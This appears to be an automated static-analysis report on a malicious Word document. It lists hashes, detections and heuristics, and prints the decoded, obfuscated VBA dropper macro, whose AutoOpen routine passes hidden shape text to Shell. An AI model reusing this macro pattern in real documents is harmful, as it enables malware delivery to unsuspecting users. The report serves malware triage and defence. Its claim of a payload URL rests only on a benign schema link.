Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d48f2cb5cc595f5c…

MALICIOUS

Office (OLE)

89.9 KB Created: 2018-12-11 08:52:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: bf493d9ce62dc9b228ab6f2b3fd677ee SHA-1: aa2e74908d0a1392dd59f111e2dd4f2c4631491a SHA-256: d48f2cb5cc595f5cea29b7fd2bd8463fdfaf980c48792294ebb4c798516a7eae
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains VBA macros with an autoopen function that triggers a Shell() call. This call executes cmd.exe with arguments that appear to construct and execute a PowerShell command. The PowerShell command is obfuscated but likely responsible for downloading and executing a second-stage payload from a remote location, as indicated by the embedded URL and the ClamAV detection name 'Doc.Dropper.Agent'.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6830924-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6830924-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     _
.Shell(zVsVoHBaFPJ, qZhSoLXwd), oqmHUiq)
   jCucUFwTwawURwcBlANBW = (64603473 + Round(AQPjOsatYovwAmIdC) * 252979340 - tOaQpZnSrzoDMZntL + (VibYjafVBcPcWKO / Tan(PzazZKbZiujljXM)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
bnqnq
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5183 bytes
SHA-256: 5385865d12234347b8a5da60c5bbaa16d67d0befb1fa89bea3e7cebf058fc5dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
153 of 182 identifiers look randomly generated (e.g. 'LJQujEFAUdFBllzoinJfBfQP') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "RStCinJwZM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
bnqnq
End Sub

Attribute VB_Name = "fltlWwRJVIiFIr"
Function bnqnq()
On Error Resume Next
   zjiinYLhwllDjGA = (181432626 + Round(uCLdacmOGqMTXwsbuvDfuRv) * 23104012 - IDJjLfbwhnwbbZE + (QjhzNZotcmLzwwcGIXRYcfuL / Tan(VqJuzSWwjdlNEsjOQGZUi)))
iKrTEHfTllWNsj = 207388330
   UdmFiAitGiMBNaaSIuGBdZs = (55016008 + Round(dZNRYRpjIZQziHzidqIi) * 234516082 - WkAEszpQvkiYAaQciRXRF + (KSamITAikazvCc / Tan(TYqtrifVJGXRAIqKR)))
WahiFqWQNzEbFYoLPsjY = 93629754
   NQiGZbjvwGZfzcs = (7951182 + Round(fhattQLaitfEPoow) * 47256574 - jNjaYCWhwFArlazDusuO + (zSjviAqjRliqzJocEJ / Tan(WMSGamHFHMuwBsKjuDf)))
BfBjURBnRJapjWrHhMFIbv = 232481328
   aPPllqhmuXYDwZUAwSITL = (1117982 + Round(JVzFAopzbALOMOK) * 65207245 - MwsjaOcfXmclUUaaHGQnkhz + (ZzCnKIlmIQHOHbi / Tan(UZcBNMHfkoEIuWH)))
wmGdLpUPAqcDNLSfYJSL = 29370576
   GkhoBpLDmYsUvJjdipWSkB = (200278905 + Round(idDhKdBLsjUHJKc) * 41656692 - ZiDubhpRCEcQpDEFbKXmis + (WjcOoYTTMQdKSaKD / Tan(NQIYZvCdQBhAFTKjZjOzSBsi)))
QALsmfQGaYOklzlZlYXmT = 44785202
   zHljVJvqRMpMFB = (49424667 + Round(WwohoBCdHdaZvT) * 105533493 - YwPRuPkFqOcNdWc + (BrNnkUQwEIcsjWvzwknGl / Tan(GGMjrZYpzkBpXEGcUDiRNm)))
sWUTfQsiVzLkGbAdqaOIrr = 299404949
   qiBtAVacBWhEKSizjCdWzr = (329437765 + Round(llvqhjGlqunrfiUaqh) * 12319430 - hoaBYzbohbowkjIPZj + (SQwOPfmSBhCjSpbozKuSiHR / Tan(PGoHwaEBGnjGlZ)))
WljaHiuWIIrLFfRL = 68580705
   RiZLfMMcjkDjLJzwtaphfw = (340555788 + Round(cKSauNFSvUcvbTaAnCvkmWc) * 203923518 - GOJUwITfjjVumhSflkrhCXa + (pudCPGGhnjozww / Tan(LJQujEFAUdFBllzoinJfBfQP)))
coHDtSinkfYldqvjtIY = 67547064
   IIkiRcBzjWMaCGQuibG = (160785397 + Round(SvjjozfzHHFAwFzLwrCiF) * 111492714 - CaNJiGRTUYppNBwdiW + (cPGaDATifjDpbBZhJaowspnl / Tan(JQkKzOYMHoFvAKIPXmj)))
iNnnUpCpZEncVzuki = 163169574
Set wpuGLn = RStCinJwZM.Shapes(FZCEz + "TnCpdnC" + vIWsFV)
   MqJbIDwnaqlKKHmDEDjX = (258433863 + Round(SlRGoqjIUScNQABn) * 211775080 - wCqBOaIwqGuXGFtBYY + (BOGERVThzqlBQXMa / Tan(UQWrzqzcNwLWTPcddiGqw)))
futLIEEiAufIjHBSDYG = 180807017
   CPlsVwzofpLjGH = (49301192 + Round(JMwGjWaGzqPiVVdULWcZDLF) * 320486877 - SObjidAEwVFfhSfoi + (fhSSKLqYjiiowHBpQIzXUNO / Tan(YAYpdEzkZRZPzADPtGt)))
VIWzisBXpGYSTsuKnB = 309195651
Set zjsATH = wpuGLn.TextFrame
   RqKCTbsSStnwbSXzQb = (196643864 + Round(PEBzssqbwozwCqIsZTBftP) * 95727281 - IjPoSvFJsjFMoLKblQVivo + (lJfZwawvzqNqIcBJBjoFSkw / Tan(OJZtdtksTqiinV)))
jtnFWbUCwkHUuGi = 175535712
Set zzbKWN = zjsATH.ContainingRange
   lnUCWvWnzRjZwzjQ = (237812479 + Round(CVGKWEVXKiJWwWbwjmUjOU) * 46309413 - LroJrXUAVLhiFaQQjzkr + (dVJwANtvAXiOdzfPMjmK / Tan(AkpwqJVEDPjPwhV)))
LrJaFUnzQcblATSzhVcl = 134468745
zVsVoHBaFPJ = zzbKWN + RJkBock + YqzIw + zqjOhjE + lhdFkKJh + OXiAR + OMNRBMY + zniVvW + bQSdU + HXipISpP
   BhABizJfIwUKdbivQpJw = (152854576 + Round(JJzYEdwhZhFYhdcKLG) * 63439508 - nblSAhYOizZfGjXrEKsfh + (WmFEtBSFdDonhiXfXWF / Tan(wcHZRBFlGANdCMEwMvnWw)))
TVqTzpTYmVazbtffnswj = 333470739
   nPaGdhbYdJUnUaHibwJ = (135911943 + Round(NIwYwKldWdNlcpjFW) * 210999175 - zrSOhtATmEYRzRLaHchjW + (vHjGCslYYFQaXXvtRiwqzZ / Tan(LOTQPbcozMGwKiarHiNfSAYu)))
fOKCjfrWJUsjbWwwQROQbk = 72541879
   OzHjjTFlUoHXpSGDP = (144285357 + Round(YbDELtiaZkSDvBN) * 184509727 - XBvroVpwjnQRntZVappK + (wnFsfACkMVbqafOaNkFOFbG / Tan(JmrshUMYRlbOqzIU)))
NXSoaNOKvMFkwpUjsjtJKC = 287405869
   zzCPVZEzpvSVlTar = (230266769 + Round(jfiLYpSGtbwZBIs) * 90803318 - WmqIZcAHwiLDkBBTMFqjoa + (zOjdBPtJcXfEFszK / Tan(dDaLGDIZuGpDCi)))
vZstswzsEUjfFw = 317017477
   PEswTlwMZzjYin = (219674807 + Round(SXaJdoAwqoiOtfzuwIVwjNqa) * 2038329 - aVQrOjTWOFqZXbDtG + (HjTtzmcVSkSEjAJNOfiw / Tan(wvWQuEWlttnHLSQwjVi)))
sNjDKYpQJMYLIFIoz = 192977168
Const qZhSoLXwd = 0
   NriKqCzWAjCNbYLcCa = (208053513 + Round(RvtDOhIMNiAlawvRYp) * 239185355 - lrTfmIKDsYCSNnDSw + (vJtkIVfRnfctENqQlab / Tan(QGWFUpciXntdTzta)))
AiwzVVfbwUobzCdqlK = 272920417
   ZqwbWaEBAJZkOPKDVNwl = (258940347 + Round(KzplYtVtdwXNRwj) * 299510518 - zzkEffwWSscCjGis + (fzmlBLjGjbNAzMTcD / Tan(oCCiTqOFAtruroUzSmGYvmEz)))
ElVUjIafHuqOAdwWwKmPljZj = 332190777
   XPEwJvzEqSPVLsTR = (187951437 + Round(BbXLTQwCwGVvXTdZ) * 70099477 - zqXnQBLIFXQfuBjqPK + (MwnAHwtivvvsmhwRmpNLWz / Tan(LYmQMTLhETjwbMqP)))
XSQNJfdwzkzBBwTNlcbVhj = 102750014
   aiNOSjVhpDnwfWjfRwBCzj = (248338509 + Round(EmENEZKzGAIjjsXWLScDm) * 106792427 - IUwLLOcrrwfKjbHcPtoriNAw + (afqiHivnpwsHNzkiJRj / Tan(hruDpMKwYSuTwn)))
jlMjOjWrfPVCtDNVvRwqi = 241887088
   ZYXcdWjTAJrWDwQ = (152651612 + Round(QfvIZYwUvtTGhiCHV) * 166907946 - mAWjfbJzzVTOlkIczSwA + (bHhdQNSapOiYkk / Tan(uwPjQZzzbihVZFCpW)))
fLsoCOOqYHGlpBAshAC = 117905583
uYzPWBYJ = Array(OBswhVS, AOoUKQ, KzzCCwCww, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(zVsVoHBaFPJ, qZhSoLXwd), oqmHUiq)
   jCucUFwTwawURwcBlANBW = (64603473 + Round(AQPjOsatYovwAmIdC) * 252979340 - tOaQpZnSrzoDMZntL + (VibYjafVBcPcWKO / Tan(PzazZKbZiujljXM)))
zYhEpViAkTXLCOddoGJnTLf = 73034815
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.